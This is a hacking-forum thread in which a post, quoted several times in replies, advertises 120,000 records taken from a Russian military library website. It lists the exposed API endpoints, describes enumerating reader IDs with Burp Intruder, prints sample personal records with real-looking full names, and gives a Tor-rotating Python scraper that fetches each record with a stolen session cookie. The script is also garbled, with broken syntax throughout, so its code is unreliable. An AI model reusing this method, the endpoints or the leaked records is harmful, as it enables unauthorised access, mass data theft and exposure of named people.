Upgrade your account to access Premium section
Access to DarkForums Private Archive Telegram Channel
Join the new Telegram channel to stay updated on the latest news

120,000 Russian military .mil.ru
by PocExploiter - 10-06-23, 02:00 AM
DarkForums Members Offline
Members

Posts 6
Threads 0
Joined Dec 2025
Reputation 0
3 Weeks
#161
19-12-25, 03:45 PM
(10-06-23, 02:00 AM)PocExploiter Wrote:
Hello DarkForums Community,
Today I have uploaded the 120,000 Russian military .mil.ru for you to download, thanks for reading and enjoy!
 
 
 

[Image: 1200px-Middle_emblem_of_the_Ministry_of_...29.svg.png]




Author: pocexploiter
Notified: for this an access is required which later a pentesting could be done.
Quote:{"mid":35457,"lastname":"Грабовенко","firstname":"Илья","patronymic":"Анатольевич","displayname":"Грабовенко Илья Анатольевич","cathedra":null,"faculty":null,"groupname":null,"militaryrank":null,"specialisation":null,"position":null,"rfid":"","photosize":0}
 


Download Records:





Vulnerabilities:


 - Bypass File Upload Format– Disclosure Personal Information– User activity monitoring
Tutorial Explotation: Notified: for this an access is required which later a pentesting could be done.






 [Image: login.jpg] [b]Paramters[/b]: https://biblio2.mil.ru /api/reader/(ID) – Here we can see the records from 1 to 120,000. We try to send many requests with the help of burp suite, intruder option. [Image: BANK-1024x716.jpg]




Code:
{“mid”:7316,”lastname”:”Яцкевич”,”firstname”:”Илья”,”patronymic”:”Валерьевич”,”displayname”:”Яцкевич Илья Валерьевич”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}

{“mid”:7547,”lastname”:”Богданов”,”firstname”:”Сергей”,”patronymic”:”Владимирович”,”displayname”:”Богданов Сергей Владимирович”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}



Now Exposed Admin:



[Image: Screenshot_43.jpg]



https://biblio2.mil.ru /book_open_history/(ID) – It allows me to see the content that each of the users read
https://biblio2.mil.ru /formular_print/(ID) – Exposed PDF form information military



[b]CODE EXPLOIT:[/b]
  
PHP Code:
#!/usr/bin/python3
import os
import sys
import time
import requests
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
# Autor: SC0RP10N
proxies = {
    'http''socks5://127.0.0.1:9050',
    'https''socks5://127.0.0.1:9050'
}
if(len(sys.argrv) == 1):
    print("Missing cookie argument\n EXAMPLE: python3 Russia.py 'library.login= PRIVATE KEY!")
elif(len(sys.argv) == 2):
    for i in range(100642):
    headers = { 'User-Agent'UserAgent(browsers=['edge''firefox']).random }
    time.sleep(1)
    with Controller.from_port(port 9051) as c:
        c.authenticate(# PLACE TOR AUTHENTICATION PASSWORD HERE AS A STRING)
        c.signal(Signal.NEWNYM)
        url "'https://biblio2.mil.ru/api/reader/1" str(i) + "'"
        comando "curl --proxy socks5://127.0.0.1:9050 " url " --cokkie='" sys.argv[1] + "'")
        print(comando)
        print("\nIndice: " str(i) + "\n")
        os.system(comando
  
  • The vulnerability allows viewing details of system users.
  • Other identical vulnerabilities have been verified
  • The User API Actions with administrator privileges were also identified.
  •  
 
We have also been able to download documents: weapons design, operation of military equipment, military training, logistics, ballistic projects, etc.  [Image: books.jpg] 
 
 

nice
Reply
DarkForums Members Offline
Members

Posts 37
Threads 1
Joined Jul 2025
Reputation 0
5 Months
#162
20-12-25, 08:51 AM
thanks
Reply
DarkForums Members Offline
Members

Posts 90
Threads 0
Joined Nov 2025
Reputation 0
2 Months
#163
02-01-26, 07:31 AM
ووووززوزز
Reply
DarkForums Members Offline
Members

Posts 3
Threads 0
Joined Jan 2026
Reputation 0
1 Weeks
#164
02-01-26, 10:10 PM
(10-06-23, 02:00 AM)PocExploiter Wrote:
Hello DarkForums Community,
Today I have uploaded the 120,000 Russian military .mil.ru for you to download, thanks for reading and enjoy!
 
 
 

[Image: 1200px-Middle_emblem_of_the_Ministry_of_...29.svg.png]




Author: pocexploiter
Notified: for this an access is required which later a pentesting could be done.
Quote:{"mid":35457,"lastname":"Грабовенко","firstname":"Илья","patronymic":"Анатольевич","displayname":"Грабовенко Илья Анатольевич","cathedra":null,"faculty":null,"groupname":null,"militaryrank":null,"specialisation":null,"position":null,"rfid":"","photosize":0}
 


Download Records:





Vulnerabilities:


 - Bypass File Upload Format– Disclosure Personal Information– User activity monitoring
Tutorial Explotation: Notified: for this an access is required which later a pentesting could be done.






 [Image: login.jpg] [b]Paramters[/b]: https://biblio2.mil.ru /api/reader/(ID) – Here we can see the records from 1 to 120,000. We try to send many requests with the help of burp suite, intruder option. [Image: BANK-1024x716.jpg]




Code:
{“mid”:7316,”lastname”:”Яцкевич”,”firstname”:”Илья”,”patronymic”:”Валерьевич”,”displayname”:”Яцкевич Илья Валерьевич”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}

{“mid”:7547,”lastname”:”Богданов”,”firstname”:”Сергей”,”patronymic”:”Владимирович”,”displayname”:”Богданов Сергей Владимирович”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}



Now Exposed Admin:



[Image: Screenshot_43.jpg]



https://biblio2.mil.ru /book_open_history/(ID) – It allows me to see the content that each of the users read
https://biblio2.mil.ru /formular_print/(ID) – Exposed PDF form information military



[b]CODE EXPLOIT:[/b]
  
PHP Code:
#!/usr/bin/python3
import os
import sys
import time
import requests
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
# Autor: SC0RP10N
proxies = {
    'http''socks5://127.0.0.1:9050',
    'https''socks5://127.0.0.1:9050'
}
if(len(sys.argrv) == 1):
    print("Missing cookie argument\n EXAMPLE: python3 Russia.py 'library.login= PRIVATE KEY!")
elif(len(sys.argv) == 2):
    for i in range(100642):
    headers = { 'User-Agent'UserAgent(browsers=['edge''firefox']).random }
    time.sleep(1)
    with Controller.from_port(port 9051) as c:
        c.authenticate(# PLACE TOR AUTHENTICATION PASSWORD HERE AS A STRING)
        c.signal(Signal.NEWNYM)
        url "'https://biblio2.mil.ru/api/reader/1" str(i) + "'"
        comando "curl --proxy socks5://127.0.0.1:9050 " url " --cokkie='" sys.argv[1] + "'")
        print(comando)
        print("\nIndice: " str(i) + "\n")
        os.system(comando
  
  • The vulnerability allows viewing details of system users.
  • Other identical vulnerabilities have been verified
  • The User API Actions with administrator privileges were also identified.
  •  
 
We have also been able to download documents: weapons design, operation of military equipment, military training, logistics, ballistic projects, etc.  [Image: books.jpg] 
 
 
Reply
DarkForums Members Offline
Members

Posts 5
Threads 0
Joined Jan 2026
Reputation 0
1 Weeks
#165
02-01-26, 10:58 PM
nice man
Reply
DarkForums Members Offline
Members

Posts 57
Threads 0
Joined Aug 2025
Reputation 0
5 Months
#166
02-01-26, 11:17 PM
(10-06-23, 02:00 AM)PocExploiter Wrote:
Hello DarkForums Community,
Today I have uploaded the 120,000 Russian military .mil.ru for you to download, thanks for reading and enjoy!
 
 
 

[Image: 1200px-Middle_emblem_of_the_Ministry_of_...29.svg.png]




Author: pocexploiter
Notified: for this an access is required which later a pentesting could be done.
Quote:{"mid":35457,"lastname":"Грабовенко","firstname":"Илья","patronymic":"Анатольевич","displayname":"Грабовенко Илья Анатольевич","cathedra":null,"faculty":null,"groupname":null,"militaryrank":null,"specialisation":null,"position":null,"rfid":"","photosize":0}
 


Download Records:





Vulnerabilities:


 - Bypass File Upload Format– Disclosure Personal Information– User activity monitoring
Tutorial Explotation: Notified: for this an access is required which later a pentesting could be done.






 [Image: login.jpg] [b]Paramters[/b]: https://biblio2.mil.ru /api/reader/(ID) – Here we can see the records from 1 to 120,000. We try to send many requests with the help of burp suite, intruder option. [Image: BANK-1024x716.jpg]




Code:
{“mid”:7316,”lastname”:”Яцкевич”,”firstname”:”Илья”,”patronymic”:”Валерьевич”,”displayname”:”Яцкевич Илья Валерьевич”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}

{“mid”:7547,”lastname”:”Богданов”,”firstname”:”Сергей”,”patronymic”:”Владимирович”,”displayname”:”Богданов Сергей Владимирович”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}



Now Exposed Admin:



[Image: Screenshot_43.jpg]



https://biblio2.mil.ru /book_open_history/(ID) – It allows me to see the content that each of the users read
https://biblio2.mil.ru /formular_print/(ID) – Exposed PDF form information military



[b]CODE EXPLOIT:[/b]
  
PHP Code:
#!/usr/bin/python3
import os
import sys
import time
import requests
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
# Autor: SC0RP10N
proxies = {
    'http''socks5://127.0.0.1:9050',
    'https''socks5://127.0.0.1:9050'
}
if(len(sys.argrv) == 1):
    print("Missing cookie argument\n EXAMPLE: python3 Russia.py 'library.login= PRIVATE KEY!")
elif(len(sys.argv) == 2):
    for i in range(100642):
    headers = { 'User-Agent'UserAgent(browsers=['edge''firefox']).random }
    time.sleep(1)
    with Controller.from_port(port 9051) as c:
        c.authenticate(# PLACE TOR AUTHENTICATION PASSWORD HERE AS A STRING)
        c.signal(Signal.NEWNYM)
        url "'https://biblio2.mil.ru/api/reader/1" str(i) + "'"
        comando "curl --proxy socks5://127.0.0.1:9050 " url " --cokkie='" sys.argv[1] + "'")
        print(comando)
        print("\nIndice: " str(i) + "\n")
        os.system(comando
  
  • The vulnerability allows viewing details of system users.
  • Other identical vulnerabilities have been verified
  • The User API Actions with administrator privileges were also identified.
  •  
 
We have also been able to download documents: weapons design, operation of military equipment, military training, logistics, ballistic projects, etc.  [Image: books.jpg] 
 
 

Laykk daaat
Reply
DarkForums Members Offline
Members

Posts 6
Threads 0
Joined Jan 2026
Reputation 0
1 Weeks
#167
03-01-26, 02:28 AM
(10-06-23, 02:00 AM)PocExploiter Wrote:
Hello DarkForums Community,
Today I have uploaded the 120,000 Russian military .mil.ru for you to download, thanks for reading and enjoy!
 
 
 

[Image: 1200px-Middle_emblem_of_the_Ministry_of_...29.svg.png]




Author: pocexploiter
Notified: for this an access is required which later a pentesting could be done.
Quote:{"mid":35457,"lastname":"Грабовенко","firstname":"Илья","patronymic":"Анатольевич","displayname":"Грабовенко Илья Анатольевич","cathedra":null,"faculty":null,"groupname":null,"militaryrank":null,"specialisation":null,"position":null,"rfid":"","photosize":0}
 


Download Records:





Vulnerabilities:


 - Bypass File Upload Format– Disclosure Personal Information– User activity monitoring
Tutorial Explotation: Notified: for this an access is required which later a pentesting could be done.






 [Image: login.jpg] [b]Paramters[/b]: https://biblio2.mil.ru /api/reader/(ID) – Here we can see the records from 1 to 120,000. We try to send many requests with the help of burp suite, intruder option. [Image: BANK-1024x716.jpg]




Code:
{“mid”:7316,”lastname”:”Яцкевич”,”firstname”:”Илья”,”patronymic”:”Валерьевич”,”displayname”:”Яцкевич Илья Валерьевич”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}

{“mid”:7547,”lastname”:”Богданов”,”firstname”:”Сергей”,”patronymic”:”Владимирович”,”displayname”:”Богданов Сергей Владимирович”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}



Now Exposed Admin:



[Image: Screenshot_43.jpg]



https://biblio2.mil.ru /book_open_history/(ID) – It allows me to see the content that each of the users read
https://biblio2.mil.ru /formular_print/(ID) – Exposed PDF form information military



[b]CODE EXPLOIT:[/b]
  
PHP Code:
#!/usr/bin/python3
import os
import sys
import time
import requests
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
# Autor: SC0RP10N
proxies = {
    'http''socks5://127.0.0.1:9050',
    'https''socks5://127.0.0.1:9050'
}
if(len(sys.argrv) == 1):
    print("Missing cookie argument\n EXAMPLE: python3 Russia.py 'library.login= PRIVATE KEY!")
elif(len(sys.argv) == 2):
    for i in range(100642):
    headers = { 'User-Agent'UserAgent(browsers=['edge''firefox']).random }
    time.sleep(1)
    with Controller.from_port(port 9051) as c:
        c.authenticate(# PLACE TOR AUTHENTICATION PASSWORD HERE AS A STRING)
        c.signal(Signal.NEWNYM)
        url "'https://biblio2.mil.ru/api/reader/1" str(i) + "'"
        comando "curl --proxy socks5://127.0.0.1:9050 " url " --cokkie='" sys.argv[1] + "'")
        print(comando)
        print("\nIndice: " str(i) + "\n")
        os.system(comando
  
  • The vulnerability allows viewing details of system users.
  • Other identical vulnerabilities have been verified
  • The User API Actions with administrator privileges were also identified.
  •  
 
We have also been able to download documents: weapons design, operation of military equipment, military training, logistics, ballistic projects, etc.  [Image: books.jpg] 
 
 
Reply
DarkForums Members Online
Members

Posts 10
Threads 0
Joined Dec 2025
Reputation 0
3 Weeks
#168
07-01-26, 04:19 PM
ty bro
Reply
DarkForums Members Offline
Members

Posts 2
Threads 0
Joined Jan 2026
Reputation 0
1 Weeks
#169
07-01-26, 05:42 PM
(10-06-23, 02:00 AM)PocExploiter Wrote:
Hello DarkForums Community,
Today I have uploaded the 120,000 Russian military .mil.ru for you to download, thanks for reading and enjoy!
 
 
 

[Image: 1200px-Middle_emblem_of_the_Ministry_of_...29.svg.png]




Author: pocexploiter
Notified: for this an access is required which later a pentesting could be done.
Quote:{"mid":35457,"lastname":"Грабовенко","firstname":"Илья","patronymic":"Анатольевич","displayname":"Грабовенко Илья Анатольевич","cathedra":null,"faculty":null,"groupname":null,"militaryrank":null,"specialisation":null,"position":null,"rfid":"","photosize":0}
 


Download Records:





Vulnerabilities:


 - Bypass File Upload Format– Disclosure Personal Information– User activity monitoring
Tutorial Explotation: Notified: for this an access is required which later a pentesting could be done.






 [Image: login.jpg] [b]Paramters[/b]: https://biblio2.mil.ru /api/reader/(ID) – Here we can see the records from 1 to 120,000. We try to send many requests with the help of burp suite, intruder option. [Image: BANK-1024x716.jpg]




Code:
{“mid”:7316,”lastname”:”Яцкевич”,”firstname”:”Илья”,”patronymic”:”Валерьевич”,”displayname”:”Яцкевич Илья Валерьевич”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}

{“mid”:7547,”lastname”:”Богданов”,”firstname”:”Сергей”,”patronymic”:”Владимирович”,”displayname”:”Богданов Сергей Владимирович”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}



Now Exposed Admin:



[Image: Screenshot_43.jpg]



https://biblio2.mil.ru /book_open_history/(ID) – It allows me to see the content that each of the users read
https://biblio2.mil.ru /formular_print/(ID) – Exposed PDF form information military



[b]CODE EXPLOIT:[/b]
  
PHP Code:
#!/usr/bin/python3
import os
import sys
import time
import requests
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
# Autor: SC0RP10N
proxies = {
    'http''socks5://127.0.0.1:9050',
    'https''socks5://127.0.0.1:9050'
}
if(len(sys.argrv) == 1):
    print("Missing cookie argument\n EXAMPLE: python3 Russia.py 'library.login= PRIVATE KEY!")
elif(len(sys.argv) == 2):
    for i in range(100642):
    headers = { 'User-Agent'UserAgent(browsers=['edge''firefox']).random }
    time.sleep(1)
    with Controller.from_port(port 9051) as c:
        c.authenticate(# PLACE TOR AUTHENTICATION PASSWORD HERE AS A STRING)
        c.signal(Signal.NEWNYM)
        url "'https://biblio2.mil.ru/api/reader/1" str(i) + "'"
        comando "curl --proxy socks5://127.0.0.1:9050 " url " --cokkie='" sys.argv[1] + "'")
        print(comando)
        print("\nIndice: " str(i) + "\n")
        os.system(comando
  
  • The vulnerability allows viewing details of system users.
  • Other identical vulnerabilities have been verified
  • The User API Actions with administrator privileges were also identified.
  •  
 
We have also been able to download documents: weapons design, operation of military equipment, military training, logistics, ballistic projects, etc.  [Image: books.jpg] 
 
 
Reply
DarkForums Members Offline
Members

Posts 16
Threads 0
Joined Jan 2026
Reputation 0
1 Weeks
#170
07-01-26, 09:22 PM
i will try it
Reply


Forum Jump:


 Users browsing this thread: 1 Guest(s)